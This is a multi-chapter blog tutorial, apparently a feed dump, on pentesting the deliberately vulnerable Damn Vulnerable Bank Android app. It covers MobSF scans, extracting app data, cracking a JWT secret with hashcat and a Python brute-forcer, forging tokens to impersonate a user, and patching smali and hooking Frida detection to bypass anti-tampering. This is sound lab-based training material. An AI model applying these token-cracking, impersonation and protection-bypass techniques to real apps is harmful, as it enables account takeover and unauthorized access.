Static Analyzer of MobSF

3.  **Upload Your APK:** Click on the upload button and select the APK file you want to analyze. MobSF will start the static analysis automatically once the APK is uploaded.

![](/content/images/2024/06/image-17.png)

Uploading the apk

## Analyzing Your First Scan

  
The Static Analyzer will dissect the APK, examining various components such as permissions, code structure, and security configurations. After the analysis is complete, MobSF will provide a detailed report highlighting potential vulnerabilities and security issues.

When the analyzer finishes, you will see a comprehensive report generated by MobSF. It is highly recommended to thoroughly review all sections of the report, as they contain valuable insights into the application&apos;s security posture.

![](/content/images/2024/06/image-18.png)

Report of MobSF

### Key Sections of the Report

**Security Analysis:** The Security Analysis section is particularly crucial as it encompasses a wide range of information focused on both the configuration and code of the application. Some of the most useful tabs within this section include:

-   **Network Configuration Analysis:** This tab reviews the security of the application&apos;s network communications. Similar to tools like Testssl for web applications, it assesses HTTPS implementation and other network security practices. Here, you can identify issues such as weak SSL/TLS configurations, insecure transmission of data, and other network-related vulnerabilities.

![](/content/images/2024/06/image-22.png)

Network Configuration Review

-   **Manifest Configuration Analysis:** The manifest file is essential for setting up the application&apos;s permissions and components. This tab analyzes the manifest for potential misconfigurations and over-permissive settings that could lead to security risks. You can download the manifest directly from MobSF for a detailed inspection.

![](/content/images/2024/06/image-19.png)

Manifest configuration review

-   **Code Analysis:** This tab delves into the source code, identifying insecure coding practices and potential vulnerabilities such as hardcoded credentials, insecure data handling, and possible SQL injection points. Code analysis often uncovers subtle issues that might not be apparent in other sections.

![](/content/images/2024/06/image-23.png)

Code review

**Reconnaissance:** The Reconnaissance section is invaluable for identifying exposed sensitive information. Key areas to examine include:

-   **Hardcoded Secrets:** This part of the report identifies any hardcoded secrets within the application, such as API keys, passwords, and tokens. These can be critical security issues as they might provide attackers with direct access to backend systems or services.
-   **Email Addresses:** The report also highlights any email addresses found within the APK. These can sometimes be used for phishing attacks or to gather more information about the application&apos;s developers and stakeholders.

![](/content/images/2024/06/image-20.png)

Possible hardcoded credentials

**Additional Insights:** MobSF provides a plethora of other details that can help enhance your application&apos;s security. This includes:

-   **File Analysis:** Inspect all files within the APK package for malicious content, unauthorized modifications, and security risks. Configuration files, assets, and embedded libraries are all analyzed to ensure they do not introduce vulnerabilities.
-   **Binary Analysis:** The compiled binary is scrutinized to uncover any hidden malicious code or unintended functionality. This involves reverse engineering and examining the binary for signs of tampering or embedded malware.

# Conclusion

In this chapter, we tackled the challenge of decoding server responses and understanding the application&apos;s behavior through reverse engineering. By extracting and analyzing the Java code from the APK, we uncovered how the application encodes and decodes data, providing valuable insights into its inner workings. This process highlighted the importance of reverse engineering in identifying and addressing potential security issues.

Moving forward, we introduced MobSF (Mobile Security Framework) as a powerful tool for performing automated security analysis of mobile applications. MobSF&apos;s capabilities in both static and dynamic analysis allowed us to gain a comprehensive understanding of the application&apos;s security posture. By utilizing MobSF, we were able to identify vulnerabilities, examine network configurations, and analyze code for insecure practices.

# References

1.  **Muellerberndt, B.** &quot;APKX: One-Step APK Decompilation With Multiple Backends.&quot; GitHub Repository. Available at: [https://github.com/muellerberndt/apkx](https://github.com/muellerberndt/apkx)
2.  **Frida: A world-class dynamic instrumentation toolkit.** &quot;Frida Documentation.&quot; Available at: [https://frida.re](https://frida.re/)
3.  **Base64 Encoding and Decoding.** &quot;RFC 4648 - The Base16, Base32, and Base64 Data Encodings.&quot; Available at: https://tools.ietf.org/html/rfc4648
4.  **XOR Obfuscation.** &quot;XOR Cipher - Wikipedia.&quot; Available at: [https://en.wikipedia.org/wiki/XOR\_cipher](https://en.wikipedia.org/wiki/XOR_cipher)
5.  **MobSF (Mobile Security Framework).** &quot;MobSF Documentation.&quot; Available at: https://mobsf.github.io/docs/
6.  **Docker Documentation.** &quot;Get Started with Docker.&quot; Available at: https://docs.docker.com/get-started/
7.  **JSON Web Tokens.** &quot;JWT.io - Introduction to JSON Web Tokens.&quot; Available at: https://jwt.io/introduction/
8.  **TestSSL.sh.** &quot;TestSSL.sh Documentation.&quot; Available at: [https://testssl.sh/](https://testssl.sh/)</content:encoded><author>Ruben Santos</author></item><item><title>Exploring Android File System and Log Vulnerabilities</title><link>https://www.kayssel.com/post/android-3</link><guid isPermaLink="true">https://www.kayssel.com/post/android-3</guid><description>In this chapter, we explored Android file system security using the com.app.damnvulnerablebank app. We identified JWT vulnerabilities and analyzed key directories. Next, we&apos;ll examine the app&apos;s encryption algorithm to see if we can access other users&apos; data using JWTs.</description><pubDate>Sat, 08 Jun 2024 09:00:33 GMT</pubDate><content:encoded># Introduction

Continuing from the previous chapter of this series, we delve deeper into the critical aspects of the file system within Android applications, focusing on security vulnerabilities and best practices. Using the Objection tool, a powerful asset for mobile security assessments, we will analyze the directories used by the com.app.damnvulnerablebank application.

Key points covered in this article include:

1.  **File System Overview**: We start by understanding the key directories in an Android application, such as cache, code cache, external cache, files, and OBB directories. We discuss their roles and the potential security implications associated with each.
2.  **Analyzing Application Directories with Objection**: By using the `env` command in Objection, we gather valuable information about the application&apos;s directories.
3.  **Significance of the /data Directory**: We delve into the /data directory, which is crucial for storing app-specific data. This section explains the subdirectories within /data, their purposes, and the security measures that protect sensitive information from unauthorized access.
4.  **Understanding the /storage Directory**: This section explains the structure of the /storage directory, which is used for external storage and accessible by users and other apps with appropriate permissions. We discuss how data in this directory can be more exposed to potential security risks.
5.  **Inspecting the Data Directory**: We demonstrate how to compress and analyze the data directory of the application using the `tar` command. This allows us to inspect the contents and identify potential security vulnerabilities.
6.  **Security Implications of JWT in Logs**: Finally, we address a common security vulnerability: the exposure of sensitive information, such as JWT tokens, in application logs. We explain how to detect these tokens in logs and discuss the risks associated with this practice.

By the end of this article, you will have a comprehensive understanding of the file system structure in Android applications, the security risks involved, and practical steps to mitigate these vulnerabilities. Let&apos;s dive in and explore how to safeguard sensitive information in mobile apps.

# File system

![](/content/images/2024/05/image-31.png)

Use of objection to analyze file system

As we explored in the previous chapter, the Objection tool is a powerful asset for assessing the security of mobile applications. Running the `env` command in Objection provides valuable information about various directories used by the application under analysis. Here, we break down the output obtained for the `com.app.damnvulnerablebank` application on an Android device:

1.  **cacheDirectory**: This directory (`/data/user/0/com.app.damnvulnerablebank/cache`) is where the app stores temporary data and cache files. The system can remove these files to free up space when necessary.
2.  **codeCacheDirectory**: Located at `/data/user/0/com.app.damnvulnerablebank/code_cache`, this directory stores data that helps speed up code execution, such as runtime compilations.
3.  **externalCacheDirectory**: This directory (`/storage/emulated/0/Android/data/com.app.damnvulnerablebank/cache`) functions similarly to `cacheDirectory`, but it is on external storage. It is accessible by the user and other apps with appropriate permissions.
4.  **filesDirectory**: The files directory (`/data/user/0/com.app.damnvulnerablebank/files`) is used for storing persistent data that should survive through the app&apos;s lifecycle. Unlike the cache, data here is not automatically removed by the system.
5.  **obbDir**: The OBB directory (`/storage/emulated/0/Android/obb/com.app.damnvulnerablebank`) stores Opaque Binary Blob (OBB) files, which typically contain large supplementary data for the APK, like additional graphics or media.
6.  **packageCodePath**: This path (`/data/app/com.app.damnvulnerablebank-210K03gT5qN-QA-_MgWCHA==/base.apk`) indicates where the installed application&apos;s APK file is located. It contains the app&apos;s code and resources.

To fully understand the significance of these directories, it&apos;s essential to look at the broader context of the `/data` and `/storage` directories in Android.

## The /data Directory in Android

In Android, the `/data` directory is a crucial part of the system&apos;s storage architecture. It is primarily used for storing app-specific data and is divided into several subdirectories:

-   **/data/app**: This subdirectory stores the installed APK files of apps.
-   **/data/data**: Here is where app-specific data is kept, including configurations, databases, shared preferences, and files.
-   **/data/user/0**: A symbolic link to `/data/data`, representing the primary user&apos;s data directory in a multi-user environment.

The `/data` directory is only accessible by the system and the respective app, ensuring that sensitive data is protected from unauthorized access.

![](/content/images/2024/05/image-32.png)

Data directory

## The /storage Directory in Android

The `/storage` directory is used for external storage, which can be accessed by the user and other apps with the appropriate permissions. It is divided into several parts:

-   **/storage/emulated/0**: This is the primary shared storage location, often referred to as &quot;Internal Storage&quot; by users. It is where the app&apos;s external cache, files, and OBB data are stored. For example:
    -   **/storage/emulated/0/Android/data/\[app\_package\_name\]/cache**: Stores the app&apos;s external cache files.
    -   **/storage/emulated/0/Android/data/\[app\_package\_name\]/files**: Stores the app&apos;s external files.
    -   **/storage/emulated/0/Android/obb/\[app\_package\_name\]**: Stores OBB files for the app.
-   **/storage/sdcard1** (or similar): Represents the external SD card if available.

The `/storage` directory is more accessible compared to the `/data` directory and is used for data that can be shared between apps and with the user, such as media files, downloads, and documents.

![](/content/images/2024/05/image-34.png)

Empty storage directory

# Inspecting the data directory

Comparing the two directories reveals that the storage directory is empty, whereas the data directory contains several subdirectories that may hold valuable information. Our plan, therefore, is to compress all the data with tar and analyze it on our own machine.

```bash
tar -zcf /sdcard/Download/data.tar.gz /data/user/0/com.app.damnvulnerablebank

```

![](/content/images/2024/05/image-33.png)

Data directory compressed

After creating the compressed file containing all the data, we can download it using adb and the pull command. Subsequently, we can extract the contents using tools such as atool or tar.

![](/content/images/2024/05/image-35.png)

Decompressed data directory

To get a high-level view of all the files inside the data directory, we can use the `tree` command. One of the files that appears to be the most interesting is jwt.xml.

![](/content/images/2024/05/image-36.png)

jwt.xml

Upon examining the file&apos;s contents, we immediately notice the presence of the application&apos;s authorization token (JWT). This poses a significant security risk, as sensitive information of this nature should be securely stored to prevent unauthorized access by malicious individuals. In a real-world scenario, such as with a banking application, unauthorized access to a JWT could potentially lead to the exposure of sensitive user data.

![](/content/images/2024/05/image-37.png)

JWT inside jwt.xml

One of the recommended tools for analyzing JWT tokens is jwt.io. If you are unfamiliar with JWT tokens, [I have a chapter in my series on hacking APIs that delves into them in depth.](https://www.kayssel.com/post/api-hacking-3/)

![](/content/images/2024/05/image-38.png)

Information inside the JWT payload

As shown in the image above, jwt.io allows us to clearly view all the data contained in the JWT, including the username and admin status of the user.
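
The same claims can also be read offline without jwt.io: the payload segment of a JWT is just unpadded base64url-encoded JSON. A minimal stdlib sketch (it only reads the claims and does **not** verify the signature):

```python
import base64
import json

def jwt_payload(token: str) -> dict:
    # A JWT is header.payload.signature; each segment is unpadded base64url
    body = token.split(".")[1]
    body += "=" * (-len(body) % 4)  # restore the stripped padding
    return json.loads(base64.urlsafe_b64decode(body))
```

Pasting the token recovered from `jwt.xml` into `jwt_payload` dumps its claims, such as the username and admin status seen above.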

One of the initial steps we can take, especially if we know the JWT is signed with HS256, is to attempt to crack it using tools like hashcat. If successful, we could potentially modify the JWT and forge tokens for any user. To attempt cracking the JWT, the following command can be used:

```bash
hashcat -a 0 -m 16500 jwt.txt /usr/share/wordlists/rockyou.txt

```

![](/content/images/2024/05/image-41.png)

In this scenario, the JWT was successfully cracked, revealing that the secret used to sign the JWT is &quot;secret.&quot; With this knowledge, the authorization system of the application has been compromised.
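
What hashcat does under the hood can be sketched in a few lines: re-sign `header.payload` with each candidate secret and compare the result against the signature carried by the token (mode 16500 is exactly this, heavily optimized). A stdlib sketch; the wordlist handling is illustrative:

```python
import base64
import hashlib
import hmac

def crack_hs256(token: str, candidates):
    # Recompute the HMAC-SHA256 signature for every candidate secret and
    # compare it with the signature carried by the token itself
    header, payload, signature = token.split(".")
    signing_input = (header + "." + payload).encode()
    for secret in candidates:
        digest = hmac.new(secret.encode(), signing_input, hashlib.sha256).digest()
        if base64.urlsafe_b64encode(digest).rstrip(b"=").decode() == signature:
            return secret
    return None
```

Fed the app&apos;s token and a wordlist such as rockyou.txt, a hit returns the signing secret; here it would return `secret`.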

# Abusing the JWT

For example, if we intercept traffic with BurpSuite when accessing the user profile, we can observe how the JWT is used to authorize the user and retrieve their corresponding data, such as the username and account number. This is visible thanks to the interface, but the raw response only contains data that appears to be encrypted, so we must rely on the user interface to see what is sent and received for the user.

![](/content/images/2024/05/image-39.png)

Profile&apos;s information with a valid JWT

![](/content/images/2024/05/image-40.png)

Encrypted response

By modifying the JWT using BurpSuite plugins like [JSON Web Tokens](https://portswigger.net/bappstore/f923cbf91698420890354c1d8958fee6), we can attempt to change the username and re-sign the token with the correct secret. This allows us to potentially impersonate another user (in this case we will try to impersonate the user rsgbengi).

![](/content/images/2024/05/image-44.png)

Trying to impersonate rsgbengi

After doing this, I noticed that the impersonated user&apos;s profile information is not shown by the application&apos;s interface.

![](/content/images/2024/05/image-43.png)

User interface without information

This means that we depend on the encrypted response data to understand what is happening. In future chapters of this series, we will learn how to decode this encrypted data.

# Sensitive information in logs

Sensitive information exposure in logs refers to the practice of recording sensitive data, such as authorization tokens or user credentials, in application logs. In Android applications, this is particularly risky because logs can be accessed by other apps or malicious actors, leading to potential security breaches.

A common practice when identifying that an application uses a JWT is to search for it in the logs. Developers often save the value of JWTs in the logs, but this is considered a vulnerability because it exposes sensitive information that could be exploited by malicious actors.

To analyze all the logs generated by the application, we can use the following command:

```bash
adb logcat | tee logs.txt

```

This command will create a file with all the logs generated by the Android device. We can then analyze this file to detect sensitive information, such as the JWT. Additionally, if we know that the application uses card numbers or similar sensitive data, we can look for this type of information in the logs as well.

In this case, as you can see in the following image, if we search for &quot;token&quot; after a successful login, we can find the JWT in the logs, demonstrating that the vulnerability is present in the application.

```bash
cat logs.txt | grep -i &quot;token&quot;

```
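
Grepping for the word &quot;token&quot; relies on the log message labelling it. JWTs also have a recognizable shape of their own: three dot-separated base64url segments, with the header almost always starting with `eyJ` (the Base64 encoding of `{&quot;`). A small sketch that scans the captured file for anything token-shaped:

```python
import re

# Three dot-separated base64url segments starting with "eyJ" are a
# strong signal for a JWT anywhere in free-form log text
JWT_RE = re.compile(r"eyJ[A-Za-z0-9_-]+\.[A-Za-z0-9_-]+\.[A-Za-z0-9_-]+")

def find_jwts(text: str):
    return JWT_RE.findall(text)

if __name__ == "__main__":
    # Usage against the capture above: find_jwts(open("logs.txt").read())
    sample = "D/Auth: token=eyJhbGciOiJIUzI1NiJ9.eyJ1IjoieCJ9.sigpart done"
    print(find_jwts(sample))
```

This catches tokens even when the surrounding log line never mentions the word &quot;token&quot; at all.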

![](/content/images/2024/06/image.png)

# Conclusions

In this chapter, we explored the security vulnerabilities within the Android file system, focusing on the com.app.damnvulnerablebank application. Using the Objection tool, we gathered detailed information about various directories and highlighted the importance of understanding their roles. We demonstrated how to inspect and analyze these directories to uncover sensitive information, such as JWT tokens, that may be improperly stored in logs. By identifying these vulnerabilities, we underscored the need for secure data handling practices to protect against unauthorized access and potential security breaches.

In the next chapter, we will delve into the encryption algorithm used by the application. This will help us determine if we can exploit the JWTs to access data from other users, further assessing the security measures of the application.

# References

1.  **OWASP Mobile Security Testing Guide**: An essential resource for understanding the various aspects of mobile security testing. [OWASP MSTG](https://owasp.org/www-project-mobile-security-testing-guide/)
2.  **JWT.io**: A tool for decoding, verifying, and generating JSON Web Tokens. It also provides comprehensive documentation on JWTs. [JWT.io](https://jwt.io/)
3.  **Objection - Runtime Mobile Exploration**: A powerful tool used for assessing mobile application security. Detailed documentation and usage guides can be found on their official site. [Objection Tool](https://github.com/sensepost/objection)
4.  **Android Developer Documentation**: Official documentation from Google on Android&apos;s file system and security practices. [Android Developers](https://developer.android.com/docs)
5.  **Hashcat - Advanced Password Recovery**: A popular tool for cracking passwords, including JWTs. [Hashcat](https://hashcat.net/hashcat/)
6.  **ADB (Android Debug Bridge) Documentation**: Essential for understanding how to interact with Android devices via command line. [ADB Documentation](https://developer.android.com/studio/command-line/adb)
7.  **Burp Suite Documentation**: Comprehensive guide on using Burp Suite for web application security testing, including JWT manipulation. [Burp Suite](https://portswigger.net/burp/documentation)
8.  **NIST Guidelines on Secure Password Storage**: Best practices for storing and managing passwords securely. [NIST Guidelines](https://pages.nist.gov/800-63-3/sp800-63b.html)
9.  **RockYou Wordlist**: A commonly used wordlist for password cracking and security testing. [RockYou Wordlist](https://github.com/danielmiessler/SecLists/blob/master/Passwords/Leaked-Databases/rockyou.txt.tar.gz)
10.  **Cybersecurity Blog on Mobile App Penetration Testing**: A detailed blog that covers various aspects of mobile app security testing.

In this second chapter, we will delve into advanced techniques and tools used in the penetration testing of Android applications. This chapter will focus on three key points:

-   **Patching an Application**: Learn how to modify an application&apos;s code to bypass security mechanisms, enabling deeper analysis and vulnerability detection.
-   **Using Objection**: Get introduced to Objection, a powerful runtime mobile exploration tool that leverages Frida&apos;s capabilities for real-time application inspection and modification. We&apos;ll cover how to install and use Objection for various security analysis tasks.
-   **Configuring the Application Backend**: Understand how to set up and configure the application&apos;s backend using Docker Compose to facilitate interaction with the API, ensuring a complete environment for security testing.

By the end of this chapter, you&apos;ll have a comprehensive understanding of these essential tools and methods, enhancing your ability to conduct thorough and effective security assessments of Android applications.

# Patching an application

Patching in pentesting refers to modifying the application&apos;s code to circumvent security measures that prevent in-depth analysis. This can involve disabling root detection, SSL pinning, or anti-debugging mechanisms. The goal is to allow the penetration tester to fully analyze the app&apos;s behavior and identify vulnerabilities without being hindered by these protections.

To patch an application, we first need to follow the process outlined in the [previous chapter](https://www.kayssel.com/post/android-1/) to decompile the application and study the code.

![](/content/images/2024/05/image-6.png)

App Decompilation

The key difference now is that instead of decompiling to Java, we will use Smali, as it allows for easier recompilation of the application with the necessary changes. With the information we already have, we can locate the code that stops the execution of the program, in this case related to Frida detection.

![](/content/images/2024/05/image-7.png)

Detection of protection measures

As shown in the image above, the changes need to be made in the `MainActivity.smali` file, where the detection occurs. By examining the code, we find the `finish` function, which is responsible for closing the app when certain conditions are met. To solve the problem and prevent the program from breaking after detecting Frida/emulation, we simply need to comment out or eliminate these parts of the code.
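Since smali treats everything after `#` as a comment, neutralizing the call is just a matter of prefixing the offending line. The sketch below is illustrative only: the file contents and paths are invented stand-ins, not DVB&apos;s real decompiled output.

```bash
# Create a stand-in smali file (invented content, for illustration only)
mkdir -p demo
printf '    invoke-virtual {p0}, Lcom/app/damnvulnerablebank/MainActivity;->finish()V\n' > demo/MainActivity.smali

# Prefix the finish() call with '#', smali's comment marker,
# so apktool skips the call when rebuilding
sed -i 's/^\([[:space:]]*invoke-virtual.*finish()V\)/# \1/' demo/MainActivity.smali
cat demo/MainActivity.smali
```

In practice you would run the `sed` against the real `MainActivity.smali` produced by apktool, after confirming the exact `invoke-virtual` line in your own decompiled output.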

![](/content/images/2024/05/image-8.png)

Comment code that terminates the application

![](/content/images/2024/05/image-23.png)

Correspondence with the code in Java

Once the changes have been made, we simply recompile the application and sign it as we did in the previous chapter.

![](/content/images/2024/05/image-9.png)

Compilation of the application

![](/content/images/2024/05/image-10.png)

Application signature process

After this, we only need to install the patched application. Thanks to the patching, we will not need to launch it with Frida every time to interact with it.

![](/content/images/2024/05/image-12.png)

Application Installation

![](/content/images/2024/05/image-11.png)

Access to the application

# Objection

Objection is described as a &quot;runtime mobile exploration&quot; tool. Simply put, this means it allows users to interact with and modify applications while they are running. Leveraging the capabilities of Frida, Objection enables real-time inspection and modification of application behavior. It is often used instead of plain Frida because it provides a higher-level, user-friendly interface and pre-built functionalities that simplify common tasks, making it more accessible for security professionals who may not be as familiar with scripting or programming.

Objection offers a variety of functionalities crucial for mobile application security analysis:

-   **Object and Method Manipulation**: Allows modification of objects and methods within the application, facilitating the detection of vulnerabilities and undesired behaviors. Today, we will focus on this functionality, but in the future, we will also use it for points 2 and 3.
-   **Application Structure Exploration**: Provides tools to navigate and examine the internal structure of the application, including views, activities, and services.
-   **Security Bypass**: Helps bypass security measures such as root detection, certificate pinning, and other protections that might hinder deeper analysis. We will cover this functionality in upcoming chapters.

## Installation Process and Usage

To install the tool, using pip alone will suffice:

```bash
pip install objection

```

Additionally, we need to start the Frida server on the Android device and bind it to port 27042; otherwise, the tool will not work:

```bash
/data/local/tmp/frida-server-16.2.1-android-x86_64 -l 0.0.0.0:27042

```

Once this is done, we will need to locate the name of the application to launch it. This can be done using the following command:

```bash
frida-ps -U

```

![](/content/images/2024/05/image-25.png)

Process Dump

After identifying the application, we can launch Objection, and the application will also be launched on the device:

```bash
objection -N -h 192.168.20.143 --gadget &quot;DamnVulnerableBank&quot; explore

```

![](/content/images/2024/05/image-13.png)

Objection startup

To detect protection measures, Objection allows you to display the different classes of the application. In this case, as shown in the following image, there are not many classes, making it easy to identify potential issues. However, in real-world scenarios, there may be many more classes, making it more challenging to find what you are looking for:

```bash
android hooking search classes com.app.damnvulnerablebank

```

![](/content/images/2024/05/image-14.png)

Detection of the FridaCheckJNI class

Once we have identified an interesting class, we can filter by its methods:

```bash
android hooking list class_methods com.app.damnvulnerablebank.FridaCheckJNI

```

![](/content/images/2024/05/image-24.png)

Search class methods

After identifying the class, we can use an agent to monitor the method and display its return value when it fails:

```bash
android hooking watch class_method com.app.damnvulnerablebank.FridaCheckJNI.fridaCheck --dump-return

```

![](/content/images/2024/05/image-15.png)

Monitoring the method&apos;s return value

Objection also allows us to load scripts from Frida and use them as needed. In the following image, you can see how I have loaded the script developed in the previous chapter to evade Frida detection:

```javascript
Java.perform(function () {
    console.log(&quot;looking for FridaCheckJNI.fridaCheck()&quot;);

    try {
        const FridaCheckJNI = Java.use(&apos;com.app.damnvulnerablebank.FridaCheckJNI&apos;);

        FridaCheckJNI.fridaCheck.implementation = function() {
            console.log(&quot;hooking fridaCheck().&quot;);
            var value = this.fridaCheck.call(this);
            console.log(&quot;fridaCheck() returned &quot; + value);
            console.log(&quot;switching fridaCheck() to 0&quot;);
            return 0;  // Always return 0 to bypass checks
        };
    } catch (e) {
        console.log(&quot;Failed to hook fridaCheck: &quot; + e.message);
    }
});

```

![](/content/images/2024/05/image-17.png)

Script import

# Application backend

The last part I wanted to discuss in this chapter is the configuration of the backend of the application to interact with the API. This is straightforward, since you can build everything directly with Docker Compose. The only detail to keep in mind is the port configuration: make sure the chosen host port is not already in use (mine was occupied by Juice Shop).
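As a concrete illustration of the port detail (a minimal invented fragment, not DVB&apos;s actual Compose file), the left-hand side of each `ports` entry is the host port that has to be free:

```yaml
# Illustrative fragment only; service name, build context, and ports are invented
services:
  backend:
    build: .
    ports:
      - "8080:3000"   # host:container; change 8080 if another service (e.g. Juice Shop) holds it
```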

![](/content/images/2024/05/image-19.png)

Docker compose file

Once you have verified and possibly adjusted the port configuration, you can deploy everything using the following command:

```bash
docker-compose up --build

```

![](/content/images/2024/05/image-18.png)

Docker build process

After setting up the application, navigate to the front-end and enter the API URL to check if everything is working correctly.

![](/content/images/2024/05/image-20.png)

Confirmation that the API is working

Finally, create a user and try to log in to access all the functionalities of the application.

![](/content/images/2024/05/image-21.png)

User registration

![](/content/images/2024/05/image-22.png)

Application Portal

# Conclusions

In this chapter, we have explored crucial techniques and tools for enhancing the penetration testing of Android applications. Here are the key takeaways:

-   **Patching an Application**: We used patching to prevent the application from stopping when Frida is detected or when the device is used in an emulated environment, allowing for more in-depth analysis and vulnerability detection.
-   **Leveraging Objection**: We introduced Objection as a user-friendly tool that simplifies the process of runtime application exploration and manipulation. Through practical examples, we learned how to manipulate objects and investigate methods within the application.
-   **Backend Configuration with Docker Compose**: We covered the setup and configuration of the application&apos;s backend using Docker Compose, enabling seamless interaction with the API. This ensures a complete and functional environment for conducting security assessments.

By mastering these techniques and tools, you are now better equipped to perform comprehensive and effective security testing on Android applications. These skills will enable you to uncover vulnerabilities, understand application behavior, and enhance overall security measures.

# References

-   Frida. Retrieved from [https://frida.re](https://frida.re/)
-   Objection. Retrieved from [https://github.com/sensepost/objection](https://github.com/sensepost/objection)
-   Android Security Testing. Retrieved from [https://owasp.org/www-project-mobile-security-testing-guide/latest/Android_Testing_Guide](https://owasp.org/www-project-mobile-security-testing-guide/latest/Android_Testing_Guide)
-   Docker Compose Documentation. Retrieved from [https://docs.docker.com/compose/](https://docs.docker.com/compose/)
-   Smali/Baksmali. Retrieved from [https://github.com/JesusFreke/smali](https://github.com/JesusFreke/smali)
-   OWASP Mobile Security Project. Retrieved from [https://owasp.org/www-project-mobile-security/](https://owasp.org/www-project-mobile-security/)
-   Pentesting Android Apps with Frida. Retrieved from [https://www.hackingarticles.in/pentesting-android-apps-using-frida/](https://www.hackingarticles.in/pentesting-android-apps-using-frida/)
-   Juice Shop. Retrieved from [https://owasp.org/www-project-juice-shop/](https://owasp.org/www-project-juice-shop/)
-   Android Developers Documentation. Retrieved from [https://developer.android.com/docs](https://developer.android.com/docs)
-   Practical Mobile Forensics. (2016). Authors: Heather Mahalik, Rohit Tamma, and Satish Bommisetty. Packt Publishing.
-   TrustedSec. Android Hacking for Beginners. Retrieved from [https://trustedsec.com/blog/android-hacking-for-beginners](https://trustedsec.com/blog/android-hacking-for-beginners)</content:encoded><author>Ruben Santos</author></item><item><title>Mastering Mobile Security: A Guide with Damn Vulnerable Bank</title><link>https://www.kayssel.com/post/android-1</link><guid isPermaLink="true">https://www.kayssel.com/post/android-1</guid><description>The article discusses using &quot;Damn Vulnerable Bank&quot; to teach mobile app security, focusing on setup, OWASP guidelines, and tools like APKTool and Frida for practical insights.</description><pubDate>Wed, 08 May 2024 14:45:08 GMT</pubDate><content:encoded># Introduction to Mobile Application Security Auditing: Embracing the Challenge with &quot;Damn Vulnerable Bank&quot;

Welcome to the first chapter of my series on Android security concepts, featuring a detailed exploration of mobile application security through &quot;Damn Vulnerable Bank&quot; (DVB), a deliberately insecure Android application. This chapter lays the groundwork for understanding and testing mobile security, offering a structured learning path that follows the OWASP Mobile Application Security Testing Guide (MASTG). As I guide you through various methodologies, tools, and practical challenges, this series will equip you with the expertise needed to audit mobile applications effectively.

**Key Takeaways of this chapter:**

-   **Methodology Grounded in OWASP MASTG:** My approach closely follows the comprehensive and accessible guidelines provided by OWASP MASTG, ensuring a robust framework for auditing Android applications. This guide not only teaches the &apos;how&apos; but also explains the &apos;why&apos; behind each testing technique, serving as a foundation for the upcoming chapters.
-   **Practical Lab Setup:** Whether you&apos;re using a physical rooted device or a virtual machine, setting up your lab is the first critical step. Tools like Android-x86 on platforms like Proxmox or VMware, combined with network proxying through BurpSuite, provide a controlled and insightful testing environment that we will build upon in subsequent chapters.
-   **In-Depth Application Analysis with &quot;Damn Vulnerable Bank&quot;:** DVB is not just an app; it&apos;s an educational tool designed to simulate a real-world banking environment filled with intentional vulnerabilities. By engaging with DVB, learners can safely explore and exploit these weaknesses to gain a deep understanding of common security flaws—a theme that will be expanded in later sections.
-   **Technological Insights:** DVB is built on common technologies such as Java, Kotlin, SQLite, and the Android SDK, intertwined with a REST API. These technologies, prevalent in many real-world applications, make DVB an excellent model for learning about potential misconfigurations and vulnerabilities, insights that we will apply and explore further in our series.
-   **Hands-On Security Testing:** From user authentication and account management to transaction security and administrative functions, DVB offers a comprehensive feature set for practical security testing. Each feature not only provides utility but also serves as a potential point of vulnerability, offering myriad opportunities for security analysis which we will continue to uncover.
-   **Advanced Techniques in Decompiling and Reverse Engineering:** Tools like APKTool and ApkX are instrumental in decompiling APK files to their foundational code, allowing for detailed analysis and modification of the app&apos;s behavior. This process is crucial for understanding and mitigating the application’s built-in defense mechanisms, a skill that will be crucial as we delve deeper into specific vulnerabilities and defense strategies.
-   **Dynamic Analysis with Frida:** Learn to use Frida, a dynamic instrumentation toolkit, to modify application behavior in real-time. This powerful tool facilitates the injection of custom scripts to probe and alter app functionalities, providing a hands-on experience in dynamic application security testing—a technique that will be pivotal in our ongoing exploration of Android security.

By the chapter&apos;s conclusion, you’ll not only know how to set up and break down an application but also how to recompile and sign an APK, ensuring it meets security standards before redistribution. Through the structured exploration of &quot;Damn Vulnerable Bank,&quot; this chapter aims to instill a profound understanding of mobile application security challenges and how to tackle them effectively. Whether you are a novice eager to dive into the world of app security or an experienced auditor refining your skills, this guide provides the knowledge and tools necessary to navigate the complex landscape of mobile vulnerabilities, setting the stage for more advanced topics in our series.

# Methodology

In my previous series, I&apos;ve dedicated specific articles to methodology. For auditing Android applications, however, I recommend following the OWASP guide—it&apos;s comprehensive and straightforward. I typically explore the &quot;techniques&quot; section, applying each test to see how the application reacts. If you&apos;re new to Android auditing, this guide will provide essential context and introduce you to the tools most frequently used in the field.

[OWASP MASTG - OWASP Mobile Application Security](https://mas.owasp.org/MASTG/)

![](/content/images/2024/04/image-48.png)

Android hacking techniques

# Lab Setup

First up, we&apos;ll set up our lab for testing. You have two main options: using a physical rooted mobile phone or a virtual machine. For simplicity, I&apos;ll use a virtual machine in this guide. If you&apos;re looking to set it up with Proxmox, I highly recommend following the detailed guidelines provided in the linked article below. This article not only explains how to install everything using Proxmox but also covers essential setups for BurpSuite and getting started with ADB. It&apos;s crucial to familiarize yourself with these tools and configurations before continuing with the rest of the series.

[Installing Android-x86 on Proxmox and Proxying to BurpSuite](https://benheater.com/installing-android-x86-on-proxmox-and-proxying-to-burpsuite/)

Alternatively, if you prefer using VMware instead of Proxmox, the same instructions apply with slight modifications for the VMware environment. Once your virtual machine is ready, we&apos;ll proceed with installing the application.

# Getting to Know Damn Vulnerable Bank

**Damn Vulnerable Bank** is more than just an app—it&apos;s a unique learning tool designed for anyone curious about mobile security. Think of it as your playground for discovering the ins and outs of app security without any real-world risks. This Android app simulates a banking environment filled with deliberate security flaws, providing a perfect, legal sandbox for you to test your hacking skills and learn about vulnerabilities in a hands-on way.

[GitHub - rewanthtammana/Damn-Vulnerable-Bank: Damn Vulnerable Bank is designed to be an intentionally vulnerable android application. This provides an interface to assess your android application security hacking skills.](https://github.com/rewanthtammana/Damn-Vulnerable-Bank?tab=readme-ov-file)

#### **What&apos;s Under the Hood?**

Let’s break down the tech stack of Damn Vulnerable Bank:

-   **Java and Kotlin:** These are the main languages used to bring the app to life, handling everything from the user interface to the complex logic behind the scenes.
-   **SQLite:** This is where all your data magic happens—user information, transaction details, you name it—all stored safely on your local device... or so you&apos;d hope!
-   **Android SDK:** This toolkit is the backbone that helps the app interact seamlessly with your Android device’s hardware and software.
-   **REST API:** The bridge between the app and its backend server, managing all the data exchanges that aren’t handled directly on your device.

These technologies are widely used in real-world apps but often come with their share of misconfigurations and outdated practices, making Damn Vulnerable Bank a great model to learn from.

